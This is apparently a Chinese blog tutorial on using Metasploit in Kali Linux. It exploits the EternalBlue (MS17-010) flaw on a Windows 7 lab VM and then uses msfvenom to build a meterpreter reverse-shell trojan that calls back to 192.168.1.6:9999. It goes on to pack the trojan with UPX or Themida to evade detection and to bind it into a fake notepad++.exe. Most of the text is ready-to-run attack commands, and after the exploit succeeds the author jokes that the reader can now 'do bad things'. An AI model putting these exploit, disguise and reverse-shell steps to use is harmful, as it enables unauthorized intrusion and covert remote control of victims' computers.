kali—metasploit
metaspolit简介:
msf是一款开源安全漏洞利用和测试工具,继承了各种平台上常见的溢出漏洞和流行的shellcode,并继续保持更新。
- 首先终端提权:
sudo su,输入密码,进入root权限。

- 打开msf:
msfconsole,进入msf,注msf版本为 msf6。
采用msf对永恒之蓝漏洞进行扫描和利用:
**永恒之蓝漏洞简介:**2017年之前window系统基本上都存在永恒之蓝漏洞,下面采用msf进行永恒之蓝漏洞的扫描和利用。
search ms17_010,针对永恒之蓝楼栋编号的应用,打开之后会看到以下模块。

- 使用模块两种方式:
use 0或use + name (use exploit/windows/smb/ms17_010_eternalblue),进入模块之后进行设置窗口:show options。

看到第一行的必选项(攻击目的的ip地址),还没有填写。接下来设置攻击目标的IP,这里需要一个window7的虚拟机。(msdn中下载相应镜像)。 - 查看靶机的ip地址:
ipconfig192.168.1.8。并且关闭目标靶机的防火墙,使得kali能够ping通。


show options来看必须要设置的选型。设置目标的ip地址,和端口号。

之后再次采用show options来查看是否已经设置完毕。- 之后开始进行攻击
run出现如下界面,攻击成功,可以开始干坏事了(退出:exit;后台运行:background)

msf生成远控制木马:
msfvenom是用来生成后门的软件,在目标机上执行后门,在本地监听上线。(msfvenom在shell里使用,不是msfconsole终端)
- windows可执行木马:
msfcenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.1.6 lport=9999 -f exe -o demo.exe

成功生成木马文件

- 开启鱼钩监视。使用
use exploit/multi/handler进行监听。

之后分别设置监听的payload、lhost、lport。

run之后就开始等待鱼钩上钩。鱼儿上钩之后自动转换成meterpreter>。
ps:木马包装两种方式。
- 使用upx file进行加壳,但是upx对文件的大小有限制,过小文件会导致加壳失败。可选择其他的软件进行加壳:Themida(只有windows版本)。
件会导致加壳失败。可选择其他的软件进行加壳:Themida(只有windows版本)。 - 使用可执行文件进行伪装,捆绑木马。
msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.1.6 lport=9999 -f exe -x notepad++.exe -o notepad++.exe。把木马文件捆绑到本来存在的x64文件notepad++.exe下。
本文介绍了如何使用KaliLinux中的Metasploit工具对Windows系统进行永恒之蓝漏洞扫描和利用,包括msfconsole的使用方法、生成Meterpreter木马以及对生成的木马进行加壳和伪装的技巧。
4096

被折叠的 条评论
为什么被折叠?



